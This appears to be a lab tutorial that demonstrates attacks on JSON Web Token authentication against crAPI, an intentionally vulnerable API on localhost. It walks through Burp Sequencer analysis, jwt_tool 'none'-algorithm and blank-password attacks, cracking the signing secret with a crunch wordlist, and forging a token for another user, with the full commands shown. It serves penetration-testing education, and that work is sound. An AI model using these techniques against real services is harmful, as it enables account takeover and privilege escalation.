API Token Attacks focusing on Jason Web Token (JWT) Attacks (crAPI as an Example)
Many APIs are using Jason Web Token (JWT) for authentication and authorization.
Jason Web Token (JWT): is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties
We will continue with crAPI as our target and we will send the login request to Burp.
and then we will send the request to the sequencer
then we will choose the sequence custom location
then we will start the live capture
we can put auto analyse on
we will wait until the capture finishes and then press analyze
after the analysis completer we can see in the summary that the overall result is extremely poor
we can dig deeper into the analysis to find more interesting information.
after this we can save tokens and take a look at it
and we can see that there are some similarities
which means we can brute-force the differences using Intruder in Burpsuite to create valid tokens.
From here we will try some attacks on JWT (Json Web Tokens).
first we will authenticate and look at the token
JWT tokens are encoded with Base64
and we can see it in the response as following:
how do we know that its a JWT token we can do it in two methods:
first by going to JWT.io and paste the token that we got
and as we can see the token has three main parts Header, Payload and Signature
the second method is to Pipe it to Base64 embedded decoder in kali or Burp suite
in JWT tokens each part is separated by a .
from here we will use JWT tool to analyse and attack our token
first we will analyse it using PlayBook mode and the command is as the following:
# jwt_tool -t http://127.0.0.1:8888/identity/api/v2/user/dashboard -rh “Authorization: Bearer eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhbWFAYW1hLmNvbSIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNjc2MTIxOTI5LCJleHAiOjE2NzY3MjY3Mjl9.Ft8SfGDz4LtOHo2kzTYOfK9VaaX7MAfz_YAXWxF8QC7OgRFE2jaM18FzRdgmihbTk9gl993EBILXqGUbZ23bvLWU3SYH2GGwA0wmqPztl4KJYewT9u1YIQveu8jadsSFmLgy25y6NMebpP6VYjpOevHBbwyTmdWB_RQYqGYQJHUeIGVOkypxWL3w60rVPmqvQQHpxYX4Hoc_W7iEWQK5EROH5LZ7cgEpSvPBUHeybpc4jXJl8QxmI8r0IP2gY5SQtZHk6ry5RWXj-mMqblw6w2has_M9anqV7BE-AO-lkkJ1y1oqBfPqHJlY0hoyr1w6-jj7qJmZBUGV0L-15_MSMg” -M pb
Playbook results
JWT tries different kinds of attacks like password attacks
we can also use the Algorithm “none” attack using JWT tool
# jwt_tool eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhbWFAYW1hLmNvbSIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNjc2MTIxOTI5LCJleHAiOjE2NzY3MjY3Mjl9.Ft8SfGDz4LtOHo2kzTYOfK9VaaX7MAfz_YAXWxF8QC7OgRFE2jaM18FzRdgmihbTk9gl993EBILXqGUbZ23bvLWU3SYH2GGwA0wmqPztl4KJYewT9u1YIQveu8jadsSFmLgy25y6NMebpP6VYjpOevHBbwyTmdWB_RQYqGYQJHUeIGVOkypxWL3w60rVPmqvQQHpxYX4Hoc_W7iEWQK5EROH5LZ7cgEpSvPBUHeybpc4jXJl8QxmI8r0IP2gY5SQtZHk6ry5RWXj-mMqblw6w2has_M9anqV7BE-AO-lkkJ1y1oqBfPqHJlY0hoyr1w6-jj7qJmZBUGV0L-15_MSMg -X a
we will try to use these tokens for authentication but it is patched we will get 404 error
we can also try Blank password attack
# jwt_tool eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhbWFAYW1hLmNvbSIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNjc2MTIxOTI5LCJleHAiOjE2NzY3MjY3Mjl9.Ft8SfGDz4LtOHo2kzTYOfK9VaaX7MAfz_YAXWxF8QC7OgRFE2jaM18FzRdgmihbTk9gl993EBILXqGUbZ23bvLWU3SYH2GGwA0wmqPztl4KJYewT9u1YIQveu8jadsSFmLgy25y6NMebpP6VYjpOevHBbwyTmdWB_RQYqGYQJHUeIGVOkypxWL3w60rVPmqvQQHpxYX4Hoc_W7iEWQK5EROH5LZ7cgEpSvPBUHeybpc4jXJl8QxmI8r0IP2gY5SQtZHk6ry5RWXj-mMqblw6w2has_M9anqV7BE-AO-lkkJ1y1oqBfPqHJlY0hoyr1w6-jj7qJmZBUGV0L-15_MSMg -X b
we will try this token similar to the previous one:
as we can see we can get with Blank password
from here we will try to perfom a crack attack
first we will create a password list using Crunch
# crunch 5 5 -o crapipw.txt
and from here we will use the jwt tool
# jwt_tool eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhbWFAYW1hLmNvbSIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNjc2MTI0NjM5LCJleHAiOjE2NzY3Mjk0Mzl9.WkfD20dmgVLa1rWZ3anpsSjjO5raVXiokiSqV8BIMiIZTQAFEpdTUe3zWoOf-JvUB1mMbkXkD_Mzk70sh88_-PLQoyuoE_rgvTWzHdZFh5jXwDjC5JengUwCYhI6szGULvT5pe0iyAWvu2TWYZ_-3HuqtazoSY20LDzVCYpR11Jpei5NENvxMisce9m0EL0qqlmUMJMjHvRem-indK7GJZ5GcubD83O9QL_4Kr2iYlm5257_x4XR7Jh7PqM00YprgaX-ND6w351GYwO4LmUs4kGhiTlLZpVPpBo33BNLgvdwSf2mHcZmWL_erEBpik4RDlXPf9FE8KfHR_KIDtXkvg -C -d crapipw.txt
from here we can create our own trusted tokens
first we will add take another user email
and go to jwt.io and create a new token
and then we will try it on Postman
so that's how we try to crack the secret key
As we can see if the JWT implementation is bad and not strong enough secret key we can perform many attacks and possibly be able to create our own tokens, we also learned to use JWT_tool and Burp suite to attack API tokens and try to gain access or escalate our privilege in the API.